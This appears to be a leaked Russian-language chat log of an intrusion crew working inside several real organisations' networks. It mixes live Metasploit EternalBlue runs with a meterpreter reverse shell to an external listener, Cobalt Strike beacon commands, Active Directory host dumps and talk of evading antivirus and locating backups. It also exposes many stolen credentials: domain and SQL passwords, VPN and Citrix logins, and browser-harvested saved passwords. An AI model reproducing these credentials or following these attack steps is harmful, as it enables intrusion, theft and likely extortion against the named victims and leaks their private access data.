msf6 exploit(windows/smb/ms17_010_psexec) > options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name Current Setting Required Description
   ---- --------------- -------- -----------
   DBGTRACE false yes Show extra debug trace info
   LEAKATTEMPTS 99 yes How many times to try to leak transaction
   NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt yes List of named pipes to check
   RHOSTS 10.7.0.73 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT 445 yes The Target port (TCP)
   SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME no The service display name
   SERVICE_NAME no The service name
   SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain CORP.TELEVISA.COM.MX no The Windows domain to use for authentication
   SMBPass R8WTksIOle1rP8)P no The password for the specified username
   SMBUser Hgutierreze no The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name Current Setting Required Description
   ---- --------------- -------- -----------
   EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
   LHOST 23.106.160.50 yes The listen address (an interface may be specified)
   LPORT 4444 yes The listen port


Exploit target:

   Id Name
   -- ----
   0 Automatic


msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 23.106.160.50:4444
[*] 10.7.0.73:445 - Authenticating to 10.7.0.73 as user 'Hgutierreze'...
[-] 10.7.0.73:445 - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_TRUSTED_RELATIONSHIP_FAILURE (Command=115 WordCount=0)
[Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_psexec) >

``пару минлюбые валидные доменныену типаКлиренс?это когда кред не хватает``
[-] 10.7.0.73:445 - Unable to find accessible named pipe!

``доменные любые добавьнета креды в опциях есть?
msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 23.106.160.50:4444
[*] 10.7.0.73:445 - Target OS: Windows Server 2008 R2 Enterprise 7600
[-] 10.7.0.73:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.

``вроде умеешь... ты же тцп_бинд вроде юзал уже...умешь так ?и забиндиться через пайпкароч смотри
ты можешь запустить там стейджлесс пейлоадне отрабатывает как? не пускает сессию? или ошибка?Все проверилне отрабатывает)да
вероятноexploit/windows/smb/ms17_010_psexecне вижу у него такого. Этот может admin/smb/ms17_010_command но он не отрабатывает и по моему может это exploit/windows/smb/ms17_010_psexecпосмотри в опцияхчерез этернал блу?ага
смотри... там вроде модуль умеет запускать ехе через этот сплойт?нета _command пашет?``
[*] 10.7.0.73:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.7.0.73:445 - Host is likely VULNERABLE to MS17-010 - Windows Server 2008 R2 Enterprise 7600 x64 (64-bit)
[*] 10.7.0.73:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.7.0.73:445 - Connecting to target for exploitation.
[+] 10.7.0.73:445 - Connection established for exploitation.
[+] 10.7.0.73:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.7.0.73:445 - CORE raw buffer dump (38 bytes)
[*] 10.7.0.73:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.7.0.73:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 10.7.0.73:445 - 0x00000020 65 20 37 36 30 30 e 7600
[+] 10.7.0.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.7.0.73:445 - Trying exploit with 12 Groom Allocations.
[10.7.0.73:445 - Sending all but last fragment of exploit packet
[10.7.0.73:445 - Starting non-paged pool grooming
[10.7.0.73:445 - Sending SMBv2 buffers
[+] 10.7.0.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.7.0.73:445 - Sending final SMBv2 buffers.
[*] 10.7.0.73:445 - Sending last fragment of exploit packet!
[*] 10.7.0.73:445 - Receiving response from exploit packet
[+] 10.7.0.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.7.0.73:445 - Sending egg to corrupted connection.
[10.7.0.73:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 10.7.0.73:4444

[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.7.0.73:445 - Connecting to target for exploitation.
[+] 10.7.0.73:445 - Connection established for exploitation.
[+] 10.7.0.73:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.7.0.73:445 - CORE raw buffer dump (38 bytes)
[*] 10.7.0.73:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.7.0.73:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 10.7.0.73:445 - 0x00000020 65 20 37 36 30 30 e 7600
[+] 10.7.0.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.7.0.73:445 - Trying exploit with 17 Groom Allocations.
[10.7.0.73:445 - Sending all but last fragment of exploit packet
[10.7.0.73:445 - Starting non-paged pool grooming
[10.7.0.73:445 - Sending SMBv2 buffers
[+] 10.7.0.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.7.0.73:445 - Sending final SMBv2 buffers.
[*] 10.7.0.73:445 - Sending last fragment of exploit packet!
[*] 10.7.0.73:445 - Receiving response from exploit packet
[+] 10.7.0.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.7.0.73:445 - Sending egg to corrupted connection.
[10.7.0.73:445 - Triggering free of corrupted buffer.

[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.7.0.73:445 - Connecting to target for exploitation.
[+] 10.7.0.73:445 - Connection established for exploitation.
[+] 10.7.0.73:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.7.0.73:445 - CORE raw buffer dump (38 bytes)
[*] 10.7.0.73:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 10.7.0.73:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris
[*] 10.7.0.73:445 - 0x00000020 65 20 37 36 30 30 e 7600
[+] 10.7.0.73:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.7.0.73:445 - Trying exploit with 22 Groom Allocations.
[10.7.0.73:445 - Sending all but last fragment of exploit packet
[10.7.0.73:445 - Starting non-paged pool grooming
[10.7.0.73:445 - Sending SMBv2 buffers
[+] 10.7.0.73:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.7.0.73:445 - Sending final SMBv2 buffers.
[*] 10.7.0.73:445 - Sending last fragment of exploit packet!
[*] 10.7.0.73:445 - Receiving response from exploit packet
[+] 10.7.0.73:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.7.0.73:445 - Sending egg to corrupted connection.
[10.7.0.73:445 - Triggering free of corrupted buffer.

[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=
[-] 10.7.0.73:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.

``и какая ось?а первый вопрос?[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=Y64nWyXyE2kdkcJyf) хзтачка видит инет?сканнер говорит что уязвима?нашел 1710 но проэксплуатировать не удается.пока ничего, пробуем другие методы, на этих 2-х тячках вообще ничего не сделатьтак тут у нас что?хмОн первые два раза не снимал, а потом снял. ХЗ может я криво сохранил, но точно знаю что переснимал был оборванили как там эта хуйня называетсяget-computersснять через пш командлетомесли ад файнд не снимает полностьюне тупиad_find.exeCMDНет через смдя говорю снять ад пшты о чем?)Нет, через cmdчерез пш?Хуйня какая тоВижу, я же его два раза переснимал.ты же в курсе что он не полный?который ты скинул?69 по ad_computers``
 ASPDC4$
 ASPDC5$
 ASPDPM2$
 CFSQL2$
 CFSQLTEST1$
 CFWEB1$
 CFWEBTEST1$
 WIN7_VM$
 sccmservice1$
 ASPDPM3$
 ASPVCS1$
 WIN7VDI-PC$
 BOBM$
 BBCTX3$
 BBCTX2
 BBCTX4$
 BBCTX1$
 BBGW3$
 ASPUTIL2$
 ASPXA3$
 BBGW1
 FCCTX3$
 CFCTX2$
 WMLXA1$
 ASPXA1$
 XENAPP76$
 ASPXA7$
 XENAPP71-2
 ASPXA9$
 CFHV1
 BBCTX6
 ASPXA5$
 ASPFS1
 BBCTX5
 BBCTX7
 ASPSQL2
 ASPXA6$
 BBCTX8
 ASPXA4$
 CFXA1$
 ASPXA2$
 ASPXA10$
 ASPXA8$
 XENAPP71
 RCMTESTTS$
 ASPSAN2012$
 RCM2012$
 ASPUTIL3$
 NTIXA1$
 NTIGSS1
 NTISAGE1$
 NTISAGE2$
 ASPXA11$
 PHXADC1$
 PHXA-1$
 ASPXA65TEMPLATE$
 XENAPP76PILOT$
 USCXA1$
 USCFS1$
 ASPSYM1$
 KOMIGTEST2008R2$
 DRUTIL01$
 ASPDC3$
 MVEXA1$
 DMGXA1$
 MVEFS1$
 NTIW71$
 EGMANAGER$
 EGCOLLECTOR$

``сколько всего пк было?С того он не работает так долго .с чего ты взял?оно все позависалонетинвок шар закончил?В ситриксдля aspsql2svc There are no resources currently available for this user.Админ залочил``
Your credentials are invalid. Try again or contact your system administrator.
```Ранее не замечал тако его всегда юзаемпалится скрипт?В него передается список хостов это автобрут, не смбЛогинсписок хостов?даlfпоследняя команда?бррпочему не работает?https://github.com/leaderimStalin/psbrau/blob/main/Invoke-SMBAutoBrute.ps1что за автобрут?автоБрут по ходу не работает в тпшмб где админ будетладно
 смотри смбшары под 2 пользакамипару мину этого``
C:\Windows\system32
BBCTX5 @ MAPCIASP\aspsql2svc
``нет юзер пользака под которым сессияда етп)[ ](https://mediaeveryone.com/group/mapciasp-com?msg=bctF5N752KHAooiC4) ?net useчто этодай нет юзерЯ знаю)так она на текущем хосте)``
C:\Windows\system32
BBCTX5 @ MAPCIASP\aspsql2svc

```сесия в тпш есть под ними``
 Но под этими кредами могу запускать cmd and ps
```такnfrты же говоришь access denied?где запускать и как?Но под этими кредами могу запускать cmd and psДоступ закрытLjcneg pfrhsnкакая ошибка?По разному, wmic, ViewSQLкак пробуешь, что не подключает?Чего не понимаешь? С этими кредами не подключитесь к серверу ASPSQL2.mapciasp.com. Под этими кредам и не запустить нагрузку. Эти креды = user:aspsql2svc pwd:map#2013я чего то не понимаю``
Не подключиться с кредами на ASPSQL2.mapciasp.com, через wmic не посмотреть дериктории
``Не подключиться с кредами на ASPSQL2.mapciasp.com, через wmic не посмоть дериктории. Удалось запустить под кредами poewershell. От aspsql2svc пробовал запускать нагрузку, ничего.да?Это pwd: map#2013:thumbsup:будем разбирать новый инструмент и метод[ ](https://mediaeveryone.com/channel/general?msg=32qzfSYtweTWNgzoD) ?всем придется читать и вникатьпо крайней мере будет обновление процесадавсе будем?можете заканчивать с текущими задачами и плавно переходим к #sisd-netнеав птш нет возможности запускать файлы шарповские из памяти?я вам собираю под х64 дл+все собираете с чеком?давай файлик шелкодаДелки палятьсянеадавайа кобальта нового нет?был самый чистый из последнихllvm могу собратьКриптор чистый есть?через полчаса будет собрание и все обсудимначнем закрыватьчерез час[ ](https://mediaeveryone.com/channel/general?msg=DQgoiuMG8xsQZaxZo) чето молчит деп(ок, сейчас попробуюsql management студия?скорее всего будем брать в 3-4 кобыу депа соберите себе нагрузки чистые на каждую личную кобуготов билдче с билдом?[ ](https://mediaeveryone.com/channel/general?msg=poH4tpKdX3YgrcJoR) взял[ ](https://mediaeveryone.com/channel/general?msg=myX45efB6jTFRGsgG) ```
https://studentappst.asu.edu/vpn/index.html egomez34 Pupilo10169!!

```
@user7``
https://cloudgw.cpcc.edu/vpn/index.html sperez14 Lisbeth1219

```
@user3проверь, она у тебя в работе была``
https://vlab.unf.edu/vpn/index.html n00647072 fLORIDAHISTORY2074!

```
@user8 еще доступыесть замена ?@tl1 есть еще че?Your credentials are invalid. Try again or contact your system administrator.
https://citrix.signature-healthcare.org/citrix/xenapp/auth/login.aspx md.raws 1984Bears
```
@user3 заменаугу, значит чисто``
Cannot find path 'C:\Users\Healdton.IT\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine' because it does not exist.
``да, донастраиваю компесли после выполнения команды выше получили ошибку, можно проверить стандартный путь ручками
```
dir $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine
```т е ты щас без работы сидишь?И еще раз, я тебе отписывался по каждой из двух которые ты давал. По одной в конфе по второй в общем. В одной даные залочили, во второй нет возможности запустить cmd``
Get-PSReadLineOption
```
последний раз скидываю, запишите ужетут доступы сдохли и сеть умерла?``
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx

```
у меня на тебя открыта эта сетьты писал в #general или в конфу?окПереустановкой OS на компе. Облять вырубился и не видел разделыв #general?так чем ты занят был?Я тебе по каждой отписывался!``
https://paloca.cernerworks.com/citrix/prodweb/

``````
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx

``````
https://paloca.cernerworks.com/citrix/prodweb/

``вчера с каждым по сеткам проходили, что у кого в работе[ ](https://mediaeveryone.com/channel/general?msg=KkJ6tAjTNcYQip8Q5) Какие?[ ](https://mediaeveryone.com/channel/general?msg=7q8mQHmN7r28bkXnh) что значит вчера пропустил?все умерли?ты чем вобще занят? у меня на тебя 2 сетки записаносоздаля тебя вчера пропустил?естьМужик ты прикалываешься? Я тебе вчера написал что залочины даныепотом создамсначала ад сними толькодаможно конфу[ ](https://mediaeveryone.com/channel/general?msg=ovxt4rPWrkyc7Tmzt) работайты отписал норм, у тебя пошел прогресс по сетке или что?в трете посмотривсё есть сессия домен `stg-healthcare.com`От куда?@tl1 На какой?@user3 еще мне ответил на вопрося понялокей[ ](https://mediaeveryone.com/channel/general?msg=g8Qfkuof4BoNauGRY) спросить про нагрузкуну как по мне если думать дальше логически от твоего предложенияпро нагрузку откуда мне знатьможет подсказатьок он работает с тпш>по всем вопросам работы к stalinя тебя отсылал к @user3 что он давно с ним работаетда и вы в одном местев этой конфе уже встречалась инфа об этомне вообще откуда знать, что то ещё в тпш мне выжеть нагрузку?[ ](https://mediaeveryone.com/channel/general?msg=hPxT9hsQA8o3dFvqP) я уже ответилв #general все сидяту 2х человек помимо меня был доступ тудавас 5 человек в одном месте[ ](https://mediaeveryone.com/channel/general?msg=5mapbAMAwqNMc4RMF) м?и ничего не получилесли я отписывал об этом еще вчераи я вижу что ты выбрали ждать 4 часавыбор спросить у коллегв кобу притянул или ла/да получил?у меня был выбор?норм в чем?4 часа просто сидел?я её ещё вчера ждал@user8 чем занят был последние 4 часа? ждал нагрузку?да тут мыникто не смог 2 кнопки нажать и нагрузку коллеге выдать?я и @user8 ?сколько человек в команде?Что точней?>мне нужна команда для спавна в тпш для сетки tcph.stg-healthcare.com[ ](https://mediaeveryone.com/channel/general?msg=aeofhWmcgAmQw4Ah2) то есть команду в тпш можно?[ ](https://mediaeveryone.com/channel/general?msg=pGT2JSTaectAeK8Mm) а точнее?у меня то же и писал в чате
роут пытаюсь сделать,чтобы не умирал, portfwd не хочет работатьНормили билд ужеа че команду на тпш можно?как у вас дела?:v:не за чтоспасибоZe8ZW53FztpsVFTюзер3а пароль не помнитсвой - какой?свой, он систему переставилон логин какой вводит?@tl1 сталин в рокете не может авторизоваться, скиньте парольбудет сегоднябилд будет?а рокет лежалну и не мог в любом случае зайти по рдп, тк доступ в рокете лежитдля тпшлично я командуожидаем чего?ожиданием, получается
мне нужна команда для спавна в тпш для сетки `tcph.stg-healthcare.com`чем сейчас заняты?hiвсем приветнет, у нас тожепривет, у меня одного лежал рокет?тут. привету?спались кажетсяпинганул сначала с ДК, потом с тачки админа, везде 100% лосс друго сегмента сети видно?ок, тогда его пропущу, посмотрю что на других адресахполучатеся даотрубили?``
Teemo[PDIPRODWEB]SYSTEM */728|2020Dec27 02:36:56> shell ping 192.168.100.247 -n 1
[*] Tasked beacon to run: ping 192.168.100.247 -n 1
[+] host called home, sent: 68 bytes
[+] received output:

Pinging 192.168.100.247 with 32 bytes of data:
Request timed out.

Ping statistics for 192.168.100.247:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

```
понятно (даже не дает зайти``
The connection has timed out

The server at 192.168.100.247 is taking too long to respond.

    The site could be temporarily unavailable or too busy. Try again in a few moments.
    If you are unable to load any pages, check your computer's network connection.
    If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web.
```172.93.105.2:18541дай сокси с дк под токено и с тачки владельцадиски видны снаружи?а сокс с тачки владельца?такая же хреньсейчас попробую с другой проксис другого места кидали?дргугие сылки то открываеттак прокся отпала не?в консоли пустоскинешь что тамвкладка консоль и нетворкоткрой отладчик в браузерефреш?и страница грузитсяна секунду показывает что зашло и потом белый экрана вырубает то что?прокся не падаетпрокся падает?и долго грузитсятолько нажимаю войти как сразу вырубает[ ](https://mediaeveryone.com/group/waterway-com?msg=wqSewELvNyiwWnvd2) неачто внутри?что интересноетак`http://192.168.100.247/AXIS_ACCC8ECFBF99,http://192.168.100.247/,11/22/2019 1:44:27 PM,13218925467505127,root,Waterway99!`@tl1 @tl2`WATERWAY\mharper LoveUnit14*`ещё не закончили, сейчас всё перепроверим что с браузеров поснимали и двинем дальше`MACMINI-EDC269`имя хоста какое? не тайммашин случаем[ ](https://mediaeveryone.com/group/waterway-com?msg=7TsNZAcfpHzmPd98t) внц порт открытеще не закончили?`192.168.6.160\posserver01\PPXMLData L00k4MyD@ta`Carbonite BackupMac
```
192.168.0.233:5900
192.168.0.233:3283
192.168.0.233:88
192.168.0.233:22 (SSH-2.0-OpenSSH_8.1)
192.168.0.233:445
````\WWSQL\S$\SQLBackup``\WW2K1\F$\Data\AKPRO_Data\BACKUPS``\WW2K1\F$\Backup``\WW2K1\Data\AKPRO_Data\BACKUPS````
<?xml version="1.0"?><configuration xmlns="http://schemas.microsoft.com/.NetConfiguration/v2.0">
  
    <appSettings/>
    <connectionStrings>
        <add name="CCCConnectionString" connectionString="Data Source=wwsql;Initial Catalog=CCC;Persist Security Info=True;User ID=sa;Password=2Vanilla1"
            providerName="System.Data.SqlClient" />
        <add name="DevelopmentConnectionString1" connectionString="Data Source=wwsql2;Initial Catalog=Development;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
      <add name="PDIConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=PDI;User ID=sa;Password=Gators1853"
          providerName="System.Data.SqlClient" />
        <add name="SharedConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=Shared;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="DevelopmentConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=Development;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="IntranetConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=Intranet;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="SharedConnectionStringWWSQL2" connectionString="Data Source=wwsql2;Initial Catalog=Shared;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="CCCConnectionString2" connectionString="Data Source=wwsql;Initial Catalog=CCC;Persist Security Info=True;User ID=sa;Password=2Vanilla1"
            providerName="System.Data.SqlClient" />
        <add name="WWBackOfficeConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=WBackOffice;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="TestConnectionString" connectionString="Data Source=BRIAN3;Initial Catalog=Test;Integrated Security=True"
            providerName="System.Data.SqlClient" />
        <add name="TestConnectionStringWWSQL2" connectionString="Data Source=WWSQL2;Initial Catalog=Test;Integrated Security=True"
            providerName="System.Data.SqlClient" />
        <add name="TestConnectionString2" connectionString="Data Source=WWSQL2;Initial Catalog=Test;Integrated Security=True"
            providerName="System.Data.SqlClient" />
        <add name="WWSQL2Test" connectionString="Data Source=WWSQL2;Initial Catalog=Test;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="VendorTestConnectionString3" connectionString="Data Source=WWSQL2;Initial Catalog=Test;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="ParametersTest3" connectionString="Data Source=WWSQL2;Initial Catalog=Test;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="TestConnectionString3" connectionString="Data Source=WWSQL2;Initial Catalog=Test;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="POItemsConnectionString4" connectionString="Data Source=WWSQL2;Initial Catalog=Test;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="POItemsConnectionString5" connectionString="Data Source=WWSQL2;Initial Catalog=Test;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="POItemsConnectionString6" connectionString="Data Source=WWSQL2;Initial Catalog=Test;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="POItemsConnectionString7" connectionString="Data Source=WWSQL2;Initial Catalog=Test;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="ChemicalConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=Chemical;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="DevelopmentConnectionString2" connectionString="Data Source=wwsql2;Initial Catalog=Development;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="ManagementInfoConnectionString" connectionString="Data Source=WWSQL2;Initial Catalog=ManagementInfo;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="SQIConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=SQI;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="ReportsConnectionString" connectionString="Data Source=reports;Initial Catalog=ExternalProcs;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="FinancialConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=Financial;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="InventoryConnectionString" connectionString="Data Source=WWSQL2;Initial Catalog=Inventory;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="CouponsConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=Coupons;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="LaborConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=Labor;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="DataWarehouseConnectionString" connectionString="Data Source=wwsql2;Initial Catalog=datawarehouse;Persist Security Info=True;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
        <add name="MorningConnectionString" connectionString="Data Source=WWSQL2;Initial Catalog=Morning;User ID=sa;Password=Gators1853"
            providerName="System.Data.SqlClient" />
      <add name="EJConnectionString" connectionString="Data Source=WWSQL2;Initial Catalog=ElectronicJournals;User ID=sa;Password=Gators1853"
          providerName="System.Data.SqlClient" />
    </connectionStrings>
	<system.net>
		<emailSettings>
			<smtp>
				<network
      host="msmr1.datotel.com"
      port="25"
	  defaultCredentials="true" />
			</smtp>
		</mailSettings>
	</system.net>
    <system.web>
      <httpHandlers>
        <add path="Reserved.ReportViewerWebControl.axd" verb="*" type="Microsoft.Reporting.WebForms.HttpHandler, Microsoft.ReportViewer.WebForms, Version=8.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
          validate="false" />
      </httpHandlers>
      <customErrors mode="Off"/>
      <compilation debug="true">
        <assemblies>
          <add assembly="Microsoft.ReportViewer.WebForms, Version=8.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
          <!--<add assembly="Microsoft.ReportViewer.Common, Version=8.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />-->
        </assemblies>
        <buildProviders>
          <add extension=".rdlc" type="Microsoft.Reporting.RdlBuildProvider, Microsoft.ReportViewer.Common, Version=8.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
        </buildProviders>
      </compilation>
      <!--
            Set compilation debug="true" to insert debugging
            symbols into the compiled page. Because this
            affects performance, set this value to true only
            during development.

            Visual Basic options:
            Set strict="true" to disallow all data type conversions
            where data loss can occur.
            Set explicit="true" to force declaration of all variables.
        -->
	 <pages>
            <namespaces>
                <clear/>
                <add namespace="System"/>
                <add namespace="System.Collections"/>
                <add namespace="System.Collections.Specialized"/>
                <add namespace="System.Configuration"/>
                <add namespace="System.Text"/>
                <add namespace="System.Text.RegularExpressions"/>
                <add namespace="System.Web"/>
                <add namespace="System.Web.Caching"/>
                <add namespace="System.Web.SessionState"/>
                <add namespace="System.Web.Security"/>
                <add namespace="System.Web.Profile"/>
                <add namespace="System.Web.UI"/>
                <add namespace="System.Web.UI.WebControls"/>
                <add namespace="System.Web.UI.WebControls.WebParts"/>
                <add namespace="System.Web.UI.HtmlControls"/>
            </namespaces>
        </pages>
        <!--
            The <authentication> section enables configuration
            of the security authentication mode used by
            ASP.NET to identify an incoming user.
        -->
        <authentication mode="Windows"/>
      <identity impersonate="true"/>
        <!--
            The <customErrors> section enables configuration
            of what to do if/when an unhandled error occurs
            during the execution of a request. Specifically,
            it enables developers to configure html error pages
            to be displayed in place of an error stack trace.

        <customErrors mode="RemoteOnly" defaultRedirect="GenericErrorPage.htm">
            <error statusCode="403" redirect="NoAccess.htm" />
            <error statusCode="404" redirect="FileNotFound.htm" />
        </customErrors>
        -->
    </system.web>
</configuration>

````\\REPORTING\D$\SQLBackup`мб
я помню только что тут 2 есхи былосолар бэкапит куда то в вг?что солар?мб солар?збсно востановили там сеть чуть не в один кликребята которые делали пропустили чето очеьн важное, я сам не в курсе до конца что именноага
там был фул ресторБля... ЛОЛ@tl1 @tl2``
C:\Program Files\N-able Technologies\AVDefender\WscRemediation.exe
C:\Program Files\N-able Technologies\AVDefender\EPProtectedService.exe
``У них тут bitdefender``
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://designcloud.mockflow.com/,https://designcloud.mockflow.com/,1/19/2017 12:11:15 PM,13129323075436512,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://login.microsoftonline.com/,https://login.microsoftonline.com/common/oauth2/authorize,1/20/2017 8:36:53 AM,13129396613038827,gkeller@waterway.com,W
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://accounts.google.com/,https://accounts.google.com/ServiceLogin,2/16/2017 2:48:17 PM,13131751697642844,waterwaytesting@gmail.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.hotschedules.com/,https://www.hotschedules.com/hs/login.jsp,2/28/2017 2:01:56 PM,13132785716990422,2120689,1534603
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://developer.authorize.net/,https://developer.authorize.net/hello_world/sandbox/,2/28/2017 3:31:08 PM,13132791068764829,gkeller727,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://192.168.33.8/,http://192.168.33.8/startwlm/login.cgi,3/20/2017 11:27:20 AM,13134500840455937,admin,1Vanilla2
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://192.168.33.8/,http://192.168.33.8/startwlm/login.cgi,3/20/2017 11:27:37 AM,13134500857385618,Admin,1Vanilla2
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://www.showmecables.com/,https://www.showmecables.com/customer/account/login/,4/17/2017 11:16:04 AM,13136919364519382,gkeller@waterway.com,Waterway99
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://hrxtest2.talx.com/,https://hrxtest2.talx.com/AuthenticationCT2/LoginAuthentication.aspx,1/20/2017 2:44:21 PM,13129418661810114,,12344321
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://securetest.i9.talx.com/,https://securetest.i9.talx.com/I9ExpressCT2/PostAuthenticated/EmployerReview.ascx,8/28/2017 1:23:59 PM,13148418239868206,,12344321
C:\Users\gkeller.WATERWAY\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://hrxtest2.talx.com/,https://hrxtest2.talx.com/AuthenticationCT2/LoginAuthentication.aspx,1/20/2017 2:44:21 PM,13129418661810114,,12344321
